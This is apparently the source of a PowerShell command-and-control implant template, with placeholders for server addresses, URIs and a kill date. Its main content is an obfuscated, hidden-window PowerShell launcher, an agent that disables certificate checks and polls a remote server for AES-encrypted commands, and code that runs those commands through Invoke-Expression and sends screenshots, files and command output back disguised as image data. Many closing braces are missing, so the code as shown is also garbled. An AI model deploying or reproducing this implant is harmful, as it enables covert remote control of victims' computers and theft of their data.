294 lines
12 KiB
294 lines
12 KiB
Function Beacon($sleeptime) {
if ($sleeptime.ToLower().Contains('m')) {
$sleeptime = $sleeptime -replace 'm', ''
[int]$newsleep = $sleeptime
[int]$newsleep = $newsleep * 60
elseif ($sleeptime.ToLower().Contains('h')) {
$sleeptime = $sleeptime -replace 'h', ''
[int]$newsleep1 = $sleeptime
[int]$newsleep2 = $newsleep1 * 60
[int]$newsleep = $newsleep2 * 60
elseif ($sleeptime.ToLower().Contains('s')) {
$newsleep = $sleeptime -replace 's', ''
} else {
$newsleep = $sleeptime
$script:sleeptime = $newsleep
New-Alias SetBeacon Beacon
$global:sleeptime = '5'
$payloadclear = @"
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}
function DEC {${function:DEC}}
function ENC {${function:ENC}}
function CAM {${function:CAM}}
function Get-Webclient {${function:Get-Webclient}}
function Primer {${function:primer}}
`$primer = primer
if (`$primer) {`$primer| iex} else {
start-sleep 1800
primer | iex }
$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
$CompressedScriptBytes = $CompressedStream.ToArray()
$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
$NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
$UnicodeEncoder = New-Object System.Text.UnicodeEncoding
$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
$payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)"
$payload = $payloadraw -replace "`n", ""
function GetImgData($cmdoutput) {
$icoimage = @(%s)
try {$image = $icoimage|get-random}catch{}
function randomgen
param (
$set = "...................@..........................Tyscf".ToCharArray()
$result = ""
for ($x = 0; $x -lt $Length; $x++)
{$result += $set | Get-Random}
return $result
$imageBytes = [Convert]::FromBase64String($image)
$maxbyteslen = 1500
$maxdatalen = 1500 + ($cmdoutput.Length)
$imagebyteslen = $imageBytes.Length
$paddingbyteslen = $maxbyteslen - $imagebyteslen
$BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen))
$ImageBytesFull = New-Object byte[] $maxdatalen
[System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length)
[System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length)
[System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length )
function Create-AesManagedObject($key, $IV) {
try {
$aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged"
} catch {
$aesManaged = New-Object "System.Security.Cryptography.AesCryptoServiceProvider"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
else {
$aesManaged.IV = $IV
if ($key) {
if ($key.getType().Name -eq "String") {
$aesManaged.Key = [System.Convert]::FromBase64String($key)
else {
$aesManaged.Key = $key
function Encrypt-String($key, $unencryptedString) {
$bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
[byte[]] $fullData = $aesManaged.IV + $encryptedData
function Encrypt-Bytes($key, $bytes) {
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
$gzipStream.Write( $bytes, 0, $bytes.Length )
$bytes = $output.ToArray()
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
[byte[]] $fullData = $aesManaged.IV + $encryptedData
function Decrypt-String($key, $encryptedStringWithIV) {
$bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
$IV = $bytes[0..15]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged.CreateDecryptor();
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
function Encrypt-String2($key, $unencryptedString) {
$unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length)
$bytes = $CompressedStream.ToArray()
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
[byte[]] $fullData = $aesManaged.IV + $encryptedData
function Decrypt-String2($key, $encryptedStringWithIV) {
$bytes = $encryptedStringWithIV
$IV = $bytes[0..15]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged.CreateDecryptor()
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)
$output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()
function Send-Response($Server, $Key, $TaskId, $Data) {
$eid = Encrypt-String $Key $TaskId
$Output = Encrypt-String2 $Key $Data
$UploadBytes = getimgdata $Output
(Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null
} catch {
Write-Host "ErrorResponse: " + $error[0]
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$URI= "%s"
$Server = "$s/%s"
$ServerClean = "$sc"
$ServerURLS = "$($ServerClean)","$($ServerClean)"
$date = (Get-Date -Format "dd/MM/yyyy")
$date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null)
$killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null)
if ($killdate -lt $date) {exit}
$sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9)
$newsleep = $sleeptimeran|get-random
if ($newsleep -lt 1) {$newsleep = 5}
start-sleep $newsleep
$URLS = %s
$RandomURI = Get-Random $URLS
$ServerClean = Get-Random $ServerURLS
$Server = "$ServerClean/$RandomURI$G/?$URI"
try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {}
while($ReadCommand) {
$RandomURI = Get-Random $URLS
$ServerClean = Get-Random $ServerURLS
$Server = "$ServerClean/$RandomURI$G/?$URI"
try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {}
try {
if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) {
if ($ReadCommandClear.ToLower().StartsWith("multicmd")) {
$splitcmd = $ReadCommandClear -replace "multicmd",""
$split = $splitcmd -split "!d-3dion@LD!-d"
foreach ($i in $split){
$id = New-Object System.String($i, 0, 5)
$c = New-Object System.String($i, 5, ($i.Length - 5))
$i = $c
$RandomURI = Get-Random $URLS
$ServerClean = Get-Random $ServerURLS
$Server = "$ServerClean/$RandomURI$G/?$URI"
if ($i.ToLower().StartsWith("upload-file")) {
try {
$Output = Invoke-Expression $i | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } # $result doesn't appear to be used anywhere?
} catch {
$Output = "ErrorUpload: " + $error[0]
Send-Response $Server $key $id $Output
} elseif ($i.ToLower().StartsWith("download-file")) {
try {
$i = $i + " -taskid " + $id
Invoke-Expression $i | Out-Null
catch {
$Output = "ErrorDownload: " + $error[0]
Send-Response $Server $key $id $Output
} elseif ($i.ToLower().StartsWith("loadmodule")) {
try {
$modulename = $i -replace "LoadModule",""
$Output = Invoke-Expression $modulename | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
} catch {
$Output = "ErrorLoadMod: " + $error[0]
Send-Response $Server $key $id $Output
} elseif ($i.ToLower().StartsWith("get-screenshotallwindows")) {
try {
$i = $i + " -taskid " + $id
Invoke-Expression $i | Out-Null
catch {
$Output = "ErrorScreenshotAllWindows: " + $error[0]
Send-Response $Server $key $id $Output
} elseif ($i.ToLower().StartsWith("get-webpage")) {
try {
$i = $i + " -taskid " + $id
Invoke-Expression $i | Out-Null
catch {
$Output = "ErrorGetWebpage: " + $error[0]
Send-Response $Server $key $id $Output
}else {
try {
$Output = Invoke-Expression $i | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$StdError = ($error[0] | Out-String)
if ($StdError){
$Output = $Output + $StdError
} catch {
$Output = "ErrorCmd: " + $error[0]
Send-Response $Server $key $id $Output
$ReadCommandClear = $null
$ReadCommand = $null
} catch {
$message = $_.Exception.Message
Send-Response $Server $key "Error" $message
} |